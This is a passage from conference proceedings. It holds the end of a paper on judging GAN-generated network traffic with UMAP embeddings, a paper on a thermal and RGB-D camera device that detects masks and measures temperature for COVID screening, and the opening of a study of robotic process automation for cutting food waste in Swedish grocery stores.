Now, generators trained on the real dataset are sampled (as above, 2,000 samples from each class), and the samples are transformed under the same embedding that was trained on real data. Fig. 5 shows the transformation of data sampled from CTGAN. We observe that the clusters are still intact, but the data is substantially noisier than the held-out real data. Moreover, most samples are generated into the correct cluster, but some clearly fall in other clusters. The empirically sampled data in Fig. 6 sees most of the clusters degenerate, with some disappearing and others merging (see the three distinct clusters of green WhatsApp packets in Fig. 3 [middle left], which have merged in Fig. 6). Here, the separation between clusters of different classes has also broken down.
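One reason the empirically sampled data loses its cluster structure can be seen in a small sketch of the naive generator from Sect. 4.3. The code below is an illustration under assumptions, not the authors' implementation: the function name `sample_empirical` and the toy rows are hypothetical. It draws every feature independently from its observed values, so per-feature frequencies are preserved while combinations that never occur in the source data can appear.

```python
import random
from typing import List, Sequence, Tuple


def sample_empirical(rows: Sequence[Tuple], n: int,
                     rng: random.Random) -> List[Tuple]:
    """Draw n synthetic rows, sampling each column independently."""
    columns = list(zip(*rows))  # one tuple of observed values per feature
    return [tuple(rng.choice(col) for col in columns) for _ in range(n)]


# Toy source data in which protocol and port are perfectly correlated.
source = [("TCP", 443), ("UDP", 53)] * 50
synthetic = sample_empirical(source, 1000, random.Random(0))

# Rows such as ("TCP", 53) never occur in the source but can be generated.
unseen = [row for row in synthetic if row not in set(source)]
```

In this toy case roughly half of the generated rows are expected to pair a protocol with the wrong port, which is the kind of broken feature relationship that a fixed embedding of the real data can expose.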
5 Results and Discussion

5.1 Held-Out vs. GAN vs. Empirical Distribution
Comparing the embeddings of out-of-sample real data (Fig. 4), the CTGAN-generated data (Fig. 5) and the empirically distributed data (Fig. 6), we see a progressive degradation of the embedding structure found in the original data
Fig. 5. GAN-Generated packets under the same UMAP embedding as Fig. 3.
(Fig. 3). The difference between empirically generated packets and those generated by CTGAN is exaggerated compared with, say, the difference between two models with slightly differing parameters, but it was used here to demonstrate the sensitivity of UMAP. We conclude that UMAP embeddings can reflect the quality of the data with respect to its similarity to the source data that was used to build the embedding, and can therefore be used confidently in evaluating traffic GANs holistically.

5.2 Comparison with Quantitative Measures
In order to confirm the intuition that UMAP is effectively reflecting the data based on similar embeddings, we calculated the GvR score for each data set. A Random Forest Classifier was trained, using cross-validation, on the original data that was used to construct the embeddings and is displayed in Fig. 3. Table 1 below lists the GvR scores of the data from Figs. 5 and 6. We note that GvR reports a higher quality of data as the accuracy of the synthetic classifier approaches the performance of the real classifier, at which point the GvR score falls to zero. Our expectation, that the data generated by CTGAN should perform poorly
Fig. 6. Empirically sampled packets under the same UMAP embedding as Fig. 3.
compared to the held-out data and better than the empirically generated data is confirmed. Therefore, we see that the intuition holds with respect to GvR analysis of the synthetic data sets.

Table 1. RFC Accuracy and GvR scores of synthetic and empirical data

Metric     Real Test   CTGAN   Empirical
Accuracy   0.648       0.358   0.178
GvR        –           0.290   0.469

5.3 Behavior of UMAP
We note that the UMAP clusters for this packet data are less clear than those in the MNIST dataset. The authors suggest several possible reasons, including the implicit underlying complexity of the data, as well as the prevalence of categorical data in the packet header dataset.
Fig. 7. The data used to train the embedding, highlighted according to whether the packet had (from left to right) an ACK flag, a PSH flag, or did NOT have TLS.
Of the 17 features exposed for embedding, all but 3 are binary. As a result, when displaying the embedding under different colors it becomes clear that the embedding is addressing the competing claims of the many categories that an observation may belong to. The 3 plots in Fig. 7 are each colored by a category different from the class label, and help to explain the fractured appearance of the packet embedding.
6 Future Work

6.1 Hyperparameter Search for Quality Embedding
In order to use UMAP for this application, a considerable amount of time was spent finding a high-quality UMAP embedding for this dataset, which led to the choice to use subsampled datasets of 12,000 packets instead of data on the scale of the original packet header dataset (>1 M packets). UMAP has several hyperparameters that impact the style and quality of the embedding. Computation time to construct embeddings was considerable, and application to new data takes longer still. Work over several traffic datasets and analysis of the impacts of categorical data should result in standard, high-quality UMAP parameters for researchers.

6.2 Use in Traffic GAN Tuning
The authors are working towards the use of GAN models to anonymize computer traffic datasets. This UMAP technique offers an insight into the trade-off between Realism, Diversity and Originality described in the GAN evaluation taxonomy from [5], which will aid in finding the limit of pattern transmission through the GAN without memorization.
References
1. Cheng, A.: PAC-GAN: packet generation of network traffic using generative adversarial networks. In: 2019 IEEE 10th Annual Information Technology, Electronics and Mobile Communication Conference (IEMCON), pp. 0728–0734 (2019)
2. Goodfellow, I., et al.: Generative adversarial nets. In: Advances in Neural Information Processing Systems, pp. 2672–2680 (2014)
3. Gulrajani, I., Ahmed, F., Arjovsky, M., Dumoulin, V., Courville, A.C.: Improved training of Wasserstein GANs. In: Guyon, I., et al. (eds.) Advances in Neural Information Processing Systems, vol. 30, pp. 5767–5777. Curran Associates, Inc. (2017)
4. Ring, M., Schlor, D., Landes, D., Hotho, A.: Flow-based network traffic generation using generative adversarial networks. CoRR, abs/1810.07795 (2018)
5. Schoen, A., Blanc, G., Gimenez, P.F., Han, Y., Majorczyk, F., Me, L.: Towards generic quality assessment of synthetic traffic for evaluating intrusion detection systems. In: RESSI 2022 - Rendez-Vous de la Recherche et de l'Enseignement de la Sécurité des Systèmes d'Information, pp. 1–3, Chambon-sur-Lac, France, May 2022
6. Syal, A.: Automatic network traffic anomaly detection and analysis using supervised machine learning techniques. PhD thesis (2019)
7. Xu, L., Skoularidou, M., Cuesta-Infante, A., Veeramachaneni, K.: Modeling tabular data using conditional GAN. CoRR, abs/1907.00503 (2019)
8. Zingo, P., Novocin, A.: Can GAN-generated network traffic be used to train traffic anomaly classifiers? In: 2020 11th IEEE Annual Information Technology, Electronics and Mobile Communication Conference (IEMCON), pp. 0540–0545 (2020)
Device for People Detection and Tracking Using Combined Color and Thermal Camera

Pawel Woronow1, Karol Jedrasiak2(B), Krzysztof Daniec1, Hubert Podgorski1, and Aleksander Nawrat1
1 Silesian University of Technology, Gliwice, Poland
2 WSB University, Wroclaw, Poland
[email protected]
Abstract. This paper presents a device developed for the detection and tracking of people, their faces and their temperatures. The solution does not require internet access to operate, so it can be used anywhere. The so-called Covid camera is designed to automate the process of measuring temperature and verifying that a person is wearing a mask. The results obtained when testing the device in real conditions are promising and will form the basis for further application research.

Keywords: COVID-19 · Image processing · Measuring temperature · Mask detection

1 Introduction
The main objective of the conducted research was to develop an effective solution for screening people suspected of coronavirus infection based on common symptoms of COVID-19. The developed solution presented in this paper is non-contact and enables continuous monitoring and reliable detection using artificial intelligence algorithms based on deep learning. The solution analyzes the recorded data at a frequency of no less than 10 Hz, i.e. without the need to create measurement queues, and is equipped with an alarm module that informs specialist personnel about the detection of a person at risk of infection. The solution allows simultaneous analysis of up to 10 people from a safe distance of at least the recommended 2 m, as opposed to the current practice of testing with a handheld thermometer. The temperature measurement is done in such a way that the device can ultimately be installed in tight passageways, checkpoints and room entrances. The solution uses a set of artificial intelligence algorithms to analyze the video streams from a thermal camera and a video camera to recognize a person's face and then measure body temperature, even if the face is covered by a mask, glasses, headgear, or other accessories. Normal body temperature depends on age, recent activity, individual characteristics, and time of day. The literature assumes that normal body temperature is between 36.1 °C and 37.2 °C. All detected abnormalities will be signaled audibly and/or visually by the alarm module, immediately upon detection, to specialist personnel and/or to the person suspected of infection, depending on the configuration.

The main assumption for the developed device was that the whole solution would work independently without the need for Internet access, allowing for use in any place, including specialist protection zones and places with difficult radio communication. An element of the developed solution is also a reporting system that enables automatic generation of daily and long-term reports on registered infections, in order to enable daily control of the situation, follow the dynamics of events and make responsible decisions based on the data. The device is intuitive and requires no operator training. The software interface and audio messages will be configurable in any language.

During the research, the authors made the following medical assumptions about system operation. Infection with the novel coronavirus (SARS-CoV-2) leads to severe pneumonia, which in turn leads in some cases to severe acute respiratory distress syndrome (ARDS) and multi-organ failure. Since the first sign of viral infection is a body temperature above 38 °C, it is recognized that measuring body temperature is one of the best, cheapest and fastest ways to identify potentially infected individuals. However, measuring the body temperature of a potentially infected person carries the risk of infecting the person taking the measurement, because currently the largest distance from which a reliable measurement can be made does not exceed 30 cm. Therefore, persons performing the measurements are forced to use the same personal protective equipment as if they were dealing with infected persons. The proposed system enables non-contact screening measurements in crowded public places, which will help to detect persons with potential fever and cough and, through early identification of infected persons, to contain or limit the spread of the virus.

© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 862–874, 2023. https://doi.org/10.1007/978-3-031-28073-3_57
The camera is constructed in such a way that each unit can act as either a server or a client. The server has a unique IP address to which all other cameras can connect.
2 Literature Review
The proposed covid camera solution will enable non-contact and continuous monitoring and reliable detection using artificial intelligence algorithms based on deep learning. The developed technology is not a one-off: after the end of the COVID-19 pandemic the solution can, after minor modifications, be used for early detection of threats such as coronaviruses, Ebola virus, SARS and Zika. The system in operation will perform automatic analyses of recorded data in near real time (not less than 10 Hz), i.e. without the need to create measurement queues, and it is also equipped with an alarm module that immediately informs specialist personnel about the detection of a person at risk of infection.
The above functionalities are intended for the following facilities identified in the country: 976 hospitals, 12 civil airports, 3511 km of borders, 5 ports, 578 railway stations, 87 prisons, 24,000 schools, 563 shopping centers, 429 universities, military facilities, and the 241.7 thousand cultural events held in the past year (including concerts and sporting events), which gathered 34 million people. They may also be used abroad.

The project identified the following specific objectives:
– development of body temperature measurement technology operating from at least 2 m with a frequency of not less than 10 Hz,
– development of an alarm module,
– development of an artificial intelligence module for the analysis of video streams from the sensory system,
– development of a wireless communication module,
– development of an inertial module,
– development of a data collection module [10],
– development of a mobile application for specialist personnel,
– development of a contactless disinfectant dispenser,
– development of a reporting module,
– integration of the above technologies into a single system operating without the need for Internet access.

For each of the above areas, a review of the literature and of existing solutions was conducted. However, due to text length limitations, only the most relevant scope is presented in this article, in an aggregated and concise manner. Covid camera is a research project aimed at checking whether a person staying among people in a closed room poses a threat to others by not wearing a mask or by having a high temperature. To realize the project, it was necessary to become acquainted with convolutional neural networks, stereo vision and thermal cameras.

2.1 Human Detection and Wearing Mask
In the world of artificial intelligence and image processing, there are many architectures that detect an object in an image, and the most popular ones include:
– Yolov4,
– SSD,
– R-CNN,
– and many others.
Fig. 1. Object detector [5]
This number continues to grow with the growing popularity of deep learning. The project proposed a CNN architecture for human detection and mask-wearing detection based on the Yolov4 architecture [5] (Fig. 1). To detect people in the image as efficiently as possible, the COCO dataset [8], which contains a large number of images of people, was used to train the neural network. To detect whether a person is wearing a mask or not, it was necessary to prepare a dataset containing pictures of both detection groups. The final number of photos used to train the network was 1,900. The project assumes a camera performance of 10 fps, so to increase network performance it was necessary to switch to TensorRT, because according to [6], TensorRT is more efficient than the regular cuDNN library on the NVIDIA Jetson Xavier (Fig. 2). The entire neural network was based on the open-source PyTorch framework; therefore, the ONNX format was used to move from one architecture to the other.

Fig. 2. NVIDIA TensorRT [3]
2.2 Tracking Humans
Merely detecting in an image whether or not a person is wearing a mask was not enough, as each detection of a person was archived in the database. Therefore, in order to avoid an excessive number of photos of the same person, an algorithm for tracking people was developed based on [7,11]. In short, DeepSORT associates the same people across the detected frames using a Kalman filter and a CNN model trained on the MOT16 dataset [9].

2.3 Camera RGB-D
The RGB-D camera provides information not only about the color, but also about the depth of the image, which is extremely important because it allows a person to be located in the thermal camera image using simple algebraic transformations based on stereovision. To improve the accuracy of the temperature measurement, it is necessary to increase the accuracy of the depth map. The selected depth camera has an average depth error of 2% at 4 m [1]. The designed covid camera consists of two IR cameras, one RGB camera and a laser. The depth map is determined on the basis of the two IR cameras, calibrated with each other. The laser in the camera provides greater precision in determining the depth map, and the RGB camera provides color information.

2.4 Thermal Camera
The Optris PI 640i camera was used to measure the temperature due to its resolution and accuracy. “The thermal imager optris PI 640i is the smallest measuring VGA infrared camera worldwide. With an optical resolution of 640 × 480 pixels, the PI 640i delivers pin-sharp radiometric pictures and videos in real time” [2].

2.5 Calibration
In order to determine the position in the thermal camera image that corresponds to a pixel position in the RGB camera image, it is necessary to define the internal parameters of the cameras:
– focal length fx, fy,
– radial distortion and tangential distortion k1, k2, k3, p1, p2,
– optical centers cx, cy.

The process of moving pixel locations from one camera to another is as follows:
– moving the pixel to the world coordinate system, using the camera's internal parameters and depth information,
– applying the rotation matrix R and the translation vector T to the resulting 3D point,
– and the transition from the world coordinate system to the local coordinate system, using the internal parameters of the second camera.

R and T are the rotation and translation that describe the relative position of the two cameras. To determine the above parameters for the thermal camera, the OpenCV library and a checkerboard pattern covered with an infrared-reflective material were used (Fig. 3).
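The three steps above can be sketched in a few lines of plain Python. This is a simplified illustration rather than the authors' code: it ignores lens distortion, treats the RGB camera frame as the world frame, and assumes that R and T map RGB coordinates into thermal coordinates and that T and the depth value share the same length unit (millimetres are assumed here). The function name `transfer_pixel` is hypothetical; the numeric values are those reported in Eqs. (1), (3), (4) and (5).

```python
def transfer_pixel(u, v, depth, K_src, K_dst, R, T):
    """Map pixel (u, v) with known depth from a source to a destination camera.

    Lens distortion is ignored; depth and T must use the same unit.
    """
    # 1) Back-project the pixel to a 3D point in the source camera frame.
    x = (u - K_src[0][2]) * depth / K_src[0][0]
    y = (v - K_src[1][2]) * depth / K_src[1][1]
    p = (x, y, depth)
    # 2) Apply the rigid transform between the cameras: q = R p + T.
    q = [sum(R[i][j] * p[j] for j in range(3)) + T[i] for i in range(3)]
    # 3) Project the 3D point into the destination image.
    u2 = K_dst[0][0] * q[0] / q[2] + K_dst[0][2]
    v2 = K_dst[1][1] * q[1] / q[2] + K_dst[1][2]
    return u2, v2

# Intrinsics and extrinsics as reported in the paper.
K_RGB = [[386.125, 0.0, 323.81], [0.0, 386.125, 239.258], [0.0, 0.0, 1.0]]
K_THERMAL = [[382.79, 0.0, 315.8], [0.0, 411.65, 238.06], [0.0, 0.0, 1.0]]
R = [[0.9997, 0.0185, 0.0172],
     [-0.0186, 0.9998, 0.004],
     [-0.0171, -0.0044, 0.9998]]
T = [10.85, -80.74, 1.3568]

# Example: an RGB pixel near the image centre at an assumed depth of 2000 mm.
u_t, v_t = transfer_pixel(320, 240, 2000.0, K_RGB, K_THERMAL, R, T)
```

A production version would first undistort the pixel coordinates with the distortion coefficients, for example through OpenCV, before back-projecting.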
Fig. 3. Sample photo from the created calibration set
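$$\mathrm{mtx}_{Thermal} = \begin{bmatrix} 382.79 & 0 & 315.8 \\ 0 & 411.65 & 238.06 \\ 0 & 0 & 1 \end{bmatrix} \tag{1}$$

$$\mathrm{dist}_{Thermal} = \begin{bmatrix} -0.2034 & 0.1364 & 0 & 0 & -0.0598 \end{bmatrix} \tag{2}$$

$$R = \begin{bmatrix} 0.9997 & 0.0185 & 0.0172 \\ -0.0186 & 0.9998 & 0.004 \\ -0.0171 & -0.0044 & 0.9998 \end{bmatrix} \tag{3}$$

$$T = \begin{bmatrix} 10.85 \\ -80.74 \\ 1.3568 \end{bmatrix} \tag{4}$$

The parameters for the RGB-D camera have been set by the manufacturer and are as follows:

$$RGB_{Thermal} = \begin{bmatrix} 386.125 & 0 & 323.81 \\ 0 & 386.125 & 239.258 \\ 0 & 0 & 1 \end{bmatrix} \tag{5}$$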
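where the above matrices have the following form:

$$\mathrm{mtx} = \begin{bmatrix} f_x & 0 & c_x \\ 0 & f_y & c_y \\ 0 & 0 & 1 \end{bmatrix} \tag{6}$$

$$\mathrm{dist} = \begin{bmatrix} k_1 & k_2 & p_1 & p_2 & k_3 \end{bmatrix} \tag{7}$$

3 Functional Results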
At the beginning of the process, the person is detected on the basis of the image read from the RGB-D camera with a resolution of 640 × 480 (this resolution was chosen to match the resolution of the thermal imager, for easier calibration and transfer of pixel positions). Then, a unique number is assigned to each tracked person by the developed DeepSORT-based algorithm [11]. Taking advantage of the fact that each tracked person has a unique number, we can assign parameters such as:
– information about wearing a mask,
– information about temperature.

In order to assign a value to the above parameters, it is necessary to run the model for head detection on each acquired frame. Unfortunately, the detection of a person and the detection of the head are two unrelated detections. Therefore, an algorithm was developed to match the found heads to people. The algorithm checks what percentage of the upper part of the human detection coincides with the head detection, see Fig. 4. However, even if the model locates the human head well, it still has a classification error. Therefore, a condition was added to increase the precision: only if the prediction repeats five times is it assigned to the tracked person. Figure 5 shows the result of the prediction, where a person with the label 'None' is a person who has not yet been assigned to any group.
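The matching and confirmation logic described above can be sketched as follows. This is one possible reading of the description, not the authors' implementation: the box format `(x1, y1, x2, y2)`, the fraction of the person box treated as its upper part, the overlap threshold, and the requirement that the five repeated predictions be consecutive are all assumptions made for illustration, and every name is hypothetical.

```python
from collections import deque

def head_overlap(person, head, upper_fraction=0.4):
    """Fraction of the head box lying inside the upper part of a person box.

    Boxes are (x1, y1, x2, y2) with the origin at the top-left of the image.
    """
    px1, py1, px2, py2 = person
    hx1, hy1, hx2, hy2 = head
    upper_y2 = py1 + upper_fraction * (py2 - py1)
    w = min(px2, hx2) - max(px1, hx1)
    h = min(upper_y2, hy2) - max(py1, hy1)
    head_area = (hx2 - hx1) * (hy2 - hy1)
    if w <= 0 or h <= 0 or head_area <= 0:
        return 0.0
    return (w * h) / head_area

def match_head(person, heads, min_overlap=0.5):
    """Return the index of the best-overlapping head, or None if none fits."""
    best = max(range(len(heads)),
               key=lambda i: head_overlap(person, heads[i]),
               default=None)
    if best is None or head_overlap(person, heads[best]) < min_overlap:
        return None
    return best

class LabelConfirmer:
    """Assign a label to a track only after it repeats `needed` times in a row."""

    def __init__(self, needed=5):
        self.recent = deque(maxlen=needed)
        self.label = None  # stays None until a prediction is confirmed

    def update(self, prediction):
        self.recent.append(prediction)
        if len(self.recent) == self.recent.maxlen and len(set(self.recent)) == 1:
            self.label = prediction
        return self.label
```

One `LabelConfirmer` would be kept per tracked identifier, so that a single misclassified frame does not change the label already assigned to a person.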
Fig. 4. Comparing mask field of detection with human field of detection
Fig. 5. Result of the algorithm for assigning a mask to the tracked person
At the same time, all pixel locations belonging to the detected person's head are mapped into the thermal camera image, using the internal parameters, the depth map information, the rotation matrix and the translation matrix. Finally, the median of each detection area is calculated to filter out extreme temperature values, and then the arithmetic mean of five successive temperatures of the same person is calculated. If the tracked person has been assigned a label and a temperature, the data is packaged and sent to the server.
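The two-stage filtering described above (a median over the head region in each frame, followed by a mean over five successive frames) can be sketched as below. The class name is hypothetical, and the use of a sliding window of the five most recent frames is an assumption; the source does not say whether the five readings overlap between reports.

```python
from collections import deque
from statistics import mean, median

class TemperatureTracker:
    """Per-person temperature estimate: per-frame median, then a 5-frame mean."""

    def __init__(self, window=5):
        self.readings = deque(maxlen=window)

    def update(self, head_pixels_celsius):
        """Add one frame; return the averaged temperature once the window is full."""
        # The median suppresses isolated hot or cold pixels within the head region.
        self.readings.append(median(head_pixels_celsius))
        if len(self.readings) < self.readings.maxlen:
            return None
        # The mean smooths frame-to-frame variation for the same tracked person.
        return mean(self.readings)
```

The tracker returns `None` until five frames have been collected, which matches the condition that data is sent only once a temperature has been assigned.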
4 Solution Architecture
The diagram below (Fig. 6) shows step by step how the algorithm works, starting with reading the frames, going through the algorithms for detecting people, masks, measuring temperature, and ending with saving data on the server.
Fig. 6. Image processing flow diagram of the designed covid camera
5 Test Results
In order to verify the functionality of the camera, it was tested for 24 h in real conditions, in the busiest place in the cooperating company. It was assumed during the research that people coming to work are healthy and do not have elevated temperatures. For the purposes of the study, some subjects wore a mask and some did not. The task of the algorithm was to detect the person and then measure the temperature and count people with and without masks (Tables 1 and 2).

Table 1. The results of people who did not wear the mask

Label          Probability (%)   Temperature (°C)
Without mask   68.22             33.18
Without mask   69.82             31.75
Without mask   86.04             33.45
Without mask   96.83             33
Without mask   97.66             33.68
Without mask   64.69             32.38
Without mask   68.8              33.02
Without mask   76.78             31.88
Without mask   93.34             31.63
With mask      59.17             33.48
With mask      60.64             32.87
Without mask   87.12             32.53
Without mask   63.75             32.17
With mask      58.97             31.9
Without mask   93.99             32.78
With mask      66.48             33.23

Table 2. Test result for 100 people who did not wear a mask

Total number of people   With mask   Without mask
100                      9           91
Table 3. Selected results from tests in real life conditions (the RGB and thermal image columns of the original table are not reproduced)

Temperature   Label          Probability
32.7 °C       without mask   68.26%
32.9 °C       without mask   62.3%
33 °C         with mask      85.54%
32.88 °C      without mask   95.95%
32.88 °C      with mask      97%
32.92 °C      without mask   67.3%
33.18 °C      without mask   98%
6 Conclusions
This paper presented the results of a research and development project aimed at supporting the work of a security guard by indicating possible threats resulting from increased human temperature or not wearing a mask. The developed solution does not require access to the Internet for operation, so it can be used anywhere. The Covid Camera is designed to automate the process of measuring temperature and verifying that a person is wearing a mask. After performing tests in real conditions (Table 3), we conclude that the camera fulfills its function, as it is able to detect whether a person is wearing a mask, measure the temperature of the person and send detected events to the server. The acquired results are promising and useful for practical application. The labeling error is acceptable, as it depends on the size of the training set, which will be increased in the future to increase precision. The temperature measurement error is hardware related and can be reduced by adding a black body in the field of view of the camera. According to the manufacturer, this error will drop from 2 °C to 0.5 °C, which is an appropriate error for checking whether a person has a fever. It is worth noting that the solution was tested in real conditions in cooperation with the hospital CSK MSWiA. In the future, the proposed covid camera might be used by UAVs for outdoor analysis [4].

Acknowledgment. This work has been supported by the National Centre for Research and Development as project ID: DOB-BIO10/19/02/2020 “Development of a modern patient management model in a life-threatening condition based on self-learning algorithmization of decision-making processes and analysis of data from therapeutic processes”.
References
1. Intel realsense d455
2. Optris pi 640i
3. Tensorrt
4. Bieda, R., Jaskot, K., Jedrasiak, K., Nawrat, A.: Recognition and location of objects in the visual field of a UAV vision system. In: Nawrat, A., Kus, Z. (eds.) Vision Based Systems for UAV Applications. Studies in Computational Intelligence, vol. 481, pp. 27–45. Springer, Heidelberg (2013). https://doi.org/10.1007/978-3-319-00369-6_2
5. Bochkovskiy, A., Wang, C.Y., Liao, H.Y.M.: Yolov4: optimal speed and accuracy of object detection. CoRR, abs/2004.10934 (2020)
6. Franklin, D.: Nvidia tensorrt delivers twice the deep learning inference for gpus & jetson tx
7. Josinski, H., Switonski, A., Jedrasiak, K., Kostrzewa, D.: Human identification based on tensor representation of the gait motion capture data. IAENG Trans. Electr. Eng. 1, 111–122 (2013)
8. Lin, T.-Y., et al.: Microsoft COCO: common objects in context. In: Fleet, D., Pajdla, T., Schiele, B., Tuytelaars, T. (eds.) ECCV 2014. LNCS, vol. 8693, pp. 740–755. Springer, Cham (2014). https://doi.org/10.1007/978-3-319-10602-1_48
9. Milan, A., Leal-Taixe, L., Reid, I., Roth, S., Schindler, K.: MOT16: a benchmark for multi-object tracking. CoRR, abs/1603.00831 (2016)
10. Nawrat, A., Jedrasiak, K., Daniec, K., Koteras, R.: Inertial navigation systems and its practical applications. New approach of indoor and outdoor localization systems (2012)
11. Wojke, N., Bewley, A., Paulus, D.: Simple online and realtime tracking with a deep association metric. CoRR, abs/1703.07402 (2017)
Robotic Process Automation for Reducing Food Wastage in Swedish Grocery Stores

Linus Leffler, Niclas Johansson Bräck, and Workneh Yilma Ayele(B)
Department of Computer Systems and Sciences, Stockholm University, Stockholm, Sweden
[email protected]
Abstract. In the wake of global warming and ever-increasing conflicts and instabilities over the control of resources and interests, which hamper agricultural development, food security has become a main priority of nations. Moreover, food wastage is a global issue that has become more serious. For example, the Food and Agriculture Organization (FAO) of the United Nations reports that it aims to reduce global food wastage in production, retail, and the supply chain. In Sweden, roughly 100,000 tons of food is wasted every year in grocery stores because it passes its expiry date, according to a government report published in 2020. Robotic Process Automation (RPA) can streamline the control of food expiry dates, leading to less food wastage. Disruptive technologies such as RPA are also predicted to have an economic impact of nearly 6.7 trillion dollars by 2025. However, little research has been conducted on using RPA or automation to manage food wastage, or on the associated benefits and challenges, even though food wastage in Sweden is a serious issue that calls for stakeholders' action. This research investigates the opportunities and challenges associated with using RPA to reduce food wastage in Swedish grocery stores. We collected data from seven Swedish grocery store employees using semi-structured interviews and applied thematic analysis to the collected data. The result shows several opportunities associated with using RPA in organizations for food wastage management in grocery stores. On the other hand, respondents fear losing jobs if RPA is implemented to manage food wastage.

Keywords: Robotic process automation · RPA · Softbots · Food wastage management · Monotonous work tasks · Grocery stores · Food supply chain
1 Introduction

According to the Food and Agriculture Organization of the United Nations (FAO¹), approximately one-third of global food production is wasted annually. Thus, the FAO set goals such as reducing food wastage as part of the 2030 Agenda for sustainable development. In Sweden, 30 000 to 100 000 tons of food is wasted in grocery stores [1]. In the wake of increased concerns for global sustainable development, the Swedish Environmental Protection Agency (EPA²) proposed a target to reduce food wastage by 20% per capita from 2020 to 2025. The EPA also aims to increase reusable food packaging by 25% from 2022 to 2030. The main issue is controlling food wastage in grocery stores, as tons of food is wasted because of expiry dates. Grocery stores need to manage their inventory process better, using expiry date information, to reduce food wastage. Mullick et al. [2] argue that the use of digital platforms enables the reduction of food wastage. The interaction with digital platforms can be performed faster and with better accuracy through Robotic Process Automation (RPA). RPA enables inventory control and management [3]. In addition, a prediction by McKinsey and Company indicates that RPA will have an impact of approximately 6.7 trillion dollars by 2025 [4]. A robotic software technology company, UiPath³, defines RPA as a software technology that enables us to develop, deploy, and control software robots, also referred to as softbots, that emulate office workers' actions. RPA is not a system, and it does not replace information systems. Instead, RPA uses systems on digital platforms to perform tasks in the same way people do, but faster [3]. Moreover, digitizing the food supply chain process and using RPA and IoT can help reduce food wastage in grocery stores [5]. However, RPA is a relatively new technology. Also, [5] argues that more needs to be known about collaboration on digital platforms to deal with food wastage issues. To the authors' knowledge, using RPA to deal with food wastage in grocery stores in Sweden is under-researched. Existing literature focuses more on the use of digitalization in general to reduce food wastage [5] and on the use of RPA in the beef supply chain [6].

¹ https://www.fao.org/platform-food-loss-waste/flw-data/background/en/.

© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 875–892, 2023. https://doi.org/10.1007/978-3-031-28073-3_58
This research presents an empirical study about the possibilities of implementing RPA in grocery stores in Sweden to reduce food wastage. Therefore, we collected qualitative data using semi-structured interviews and did a thematic analysis to identify the benefits and the disadvantages of implementing RPA technology to help grocery stores in Sweden. This paper has five sections; Sect. 2 presents an overview of RPA and previous studies, Sect. 3 presents the research methodology, and the last two sections present the results and discussions, respectively.
2 Robotic Process Automation

Robotic Process Automation (RPA), also known as Soft Robot, is a software technology that enables you to automate repetitive and simple tasks by emulating human interaction with a computer [7]. RPA does the work we do, but faster and with better accuracy [3]. RPA can generally be divided into two major categories, attended and unattended: attended RPA works simultaneously with active human agents, whereas unattended RPA works with no human intervention [7]. Using the “outside-in” method, which means the existing system is unchanged, RPA replaces people by mapping processes with the computer's runtime and execution scripts using a control dashboard [8, p. 1].

² http://www.naturvardsverket.se/Miljoarbete-I-samhallet/Miljoarbete-I-Sverige/Regeringsuppdrag/Redovisade-2020/Forslag-till-tva-nya-etappmal-for-forebyggande-av-avfall/.
³ https://www.uipath.com/rpa/robotic-process-automation.
Not all processes are suitable for RPA; processes that are suitable for RPA automation are illustrated in Fig. 1.
Fig. 1. Features of processes suitable for robotic process automation [3, p. 9]
RPA is used in several types of workflows and business process execution activities by mimicking human workers, as discussed above. One sector where this applies is grocery stores, where a substantial part of the work consists of small, repetitive tasks. McAbee [9] suggests that such tasks should be automated so that workers can focus on more creative tasks. In addition, [3] states that RPA enables grocery stores to expedite their workflows by replacing human involvement in repetitive and monotonous tasks, streamlining the control of the expiry date handling process, which will lead to reduced food wastage.

2.1 The History of RPA

The term automation, which is believed to have been coined around the 1940s at the Ford Motor Company, originates from the Greek words autos and matos, meaning self and moving, respectively [10]. Computers and software systems were later introduced to manage tasks that had previously been executed as paper-based manual business processes. Bookkeeping, inventory management, and communications management are examples of processes that are now automated [11]. According to UiPath⁴, the term “Robotic Process Automation” was introduced in the early 2000s, although the technology was already under development before then. According to [12], RPA 2.0, the next generation of RPA, will be more powerful, with more AI features, and will enable companies to operate a larger digital workforce with employees working closely alongside it.

2.2 Previous Studies

This section presents an overview of previous studies from the literature, including studies about the advantages and challenges of adopting RPA.

⁴ https://www.uipath.com/rpa/robotic-process-automation.
L. Leffler et al.
The Advantages of Adopting RPA. Companies adopt RPA for several reasons; see Fig. 2 for the advantages of adopting RPA. For example, [13] analyzed case studies of RPA adoption and concluded that the main reasons for adopting RPA are reducing human error and reducing costs. In addition, RPA can be implemented without introducing changes to existing information and without re-engineering the existing system, and it can save up to 55% of costs for rule-based processes [3].
Fig. 2. Benefits of RPA implementation in enterprises [3, p. 10]
The Challenges of Using RPA. The disadvantages we found in the literature relate to the nature of the process, implementation issues, and employee concerns. The challenges are:
• Human involvement is essential, as a fully automated supply chain is impossible: front-office activities such as managing customer relationships and developing strategic plans for the supply network are human-dependent. However, most back-office activities in the supply chain are suitable for automation [3].
• A significant drawback of RPA is the fear that humans will not be needed if a robot can perform the process faster and more consistently, and that robots will replace humans in the future. However, RPA is not a cognitive solution for computer-driven processes. It cannot learn from experience and is only used to mimic how a human would perform a task in usual routines [12].
• Implementing RPA in a highly complex process is a common mistake that results in high automation costs. The time and effort could have been spent automating multiple processes instead. It is more efficient to tackle more complex processes once a better understanding of RPA methodology has been developed, since processes of low or medium complexity are more suitable for RPA.
• Another pitfall is trying to eliminate human input from a process entirely, which results in additional cost or delayed benefits. Conversely, savings are reduced if no effort is made to change existing processes so that RPA can do as much of the work within a process as possible. It is essential to find a balance by allowing human input where it is needed while automating as much of the process as possible. A good target is to automate about 70% of a process and leave the remaining 30% to human interaction [14].
2.3 Related Studies in Food Wastage Reduction
Previous studies focus on the theoretical aspects, such as the usability of RPA in the supply chain, and they are very few. Related studies are:
• Annosi et al. [5] conducted an empirical study, based on eighteen semi-structured interviews, of the collaboration practices that actors in the digital food supply chain adopt to solve problems such as food waste. The study indicates that digitization through RPA and IoT can help reduce food wastage in food supply chains. The identified measures for reducing food wastage in the supply chain are implementing government regulations and strategies for food wastage reduction, educating consumers, and improving supply chain processes.
• Mullick et al. [2] investigated how food wastage reduction can be achieved through digital platforms, but RPA is not considered in this study. The study involved collecting data about food wastage from digital platforms, such as calculating near-expiration discounts and measuring the number of consumers who viewed near-expired products.
